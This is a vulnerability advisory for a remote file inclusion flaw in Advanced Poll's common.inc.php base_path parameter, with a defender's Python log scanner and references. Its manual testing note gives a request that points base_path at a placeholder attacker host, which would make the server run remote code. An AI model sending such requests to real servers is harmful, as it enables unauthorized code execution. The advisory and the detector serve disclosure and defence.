Advanced Poll common.inc.php base_path Variable Remote File Inclusion

2003-10-25T09:13:47
ID OSVDB:25172
Type osvdb
Reporter Frog Man(leseulfrog@hotmail.com)
Modified 2003-10-25T09:13:47

Description

Vulnerability Description

Advanced Poll contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to common.inc.php not properly sanitizing user input supplied to the 'base_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Manual Testing Notes

http://[target]/[path]/admin/common.inc.php?base_path=http://[attacker]
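
A defender-side check for the request pattern in the testing note above, as an added example that is not part of the original advisory: it scans web server access-log lines for requests to common.inc.php whose base_path parameter points at a remote URL. The Combined Log Format, the sample log lines, and the function and variable names are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request portion of a Common/Combined Log Format line (assumed log format).
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
# Value that starts with a URL scheme ("http://", "ftp://") or is protocol-relative ("//host").
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*:)?//', re.IGNORECASE)

# Constructed sample lines (documentation addresses and hosts, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /poll/admin/common.inc.php'
    '?base_path=http://files.example.test/ HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /poll/admin/common.inc.php'
    '?base_path=hTTp%3A%2F%2Ffiles.example.test%2F HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2024:10:01:00 +0000] "GET /poll/admin/common.inc.php'
    '?base_path=../include/ HTTP/1.1" 200 900',
    '203.0.113.9 - - [01/Jan/2024:10:02:00 +0000] "GET /poll/index.php'
    '?ref=http://www.example.test/ HTTP/1.1" 200 1400',
]

def find_remote_base_path(lines, script="common.inc.php", param="base_path"):
    """Return one record per request that passes a remote URL in `param` to `script`."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parsable access-log line
        try:
            url = urlsplit(m.group("target"))
        except ValueError:
            continue  # malformed request target
        # Compare the decoded path so an encoded script name is still recognised.
        if not unquote(url.path).lower().endswith("/" + script):
            continue
        # parse_qs percent-decodes values, so encoded "://" is caught as well.
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            if REMOTE_RE.match(value):
                hits.append({"client": m.group("ip"),
                             "status": m.group("status"),
                             "value": value})
    return hits

if __name__ == "__main__":
    for hit in find_remote_base_path(SAMPLE_LOG):
        print(hit)
```

Only the query string is visible in access logs, so this check covers GET requests; a hit with a 200 status is worth correlating with outbound connections from the web server at the same time.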

References:

Vendor URL: http://www.proxy2.de/scripts.php
Secunia Advisory ID: 10068
Related OSVDB ID: 2743
Related OSVDB ID: 3292
Related OSVDB ID: 3291
Related OSVDB ID: 25169
Related OSVDB ID: 25170
Related OSVDB ID: 25173
Related OSVDB ID: 25171
Other Advisory URL: http://packetstormsecurity.nl/0310-exploits/php.advanced.poll.txt
Other Advisory URL: http://archives.neohapsis.com/archives/vulnwatch/2003-q4/0019.html
Other Advisory URL: http://www.phpsecure.info/v2/tutos/frog/AdvancedPoll2.0.2.txt
Other Advisory URL: http://www.solpotcrew.org/adv/solpot-adv-02.txt
Nessus Plugin ID: 11487
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-07/0365.html
ISS X-Force ID: 13514
CVE-2003-1179
Bugtraq ID: 8890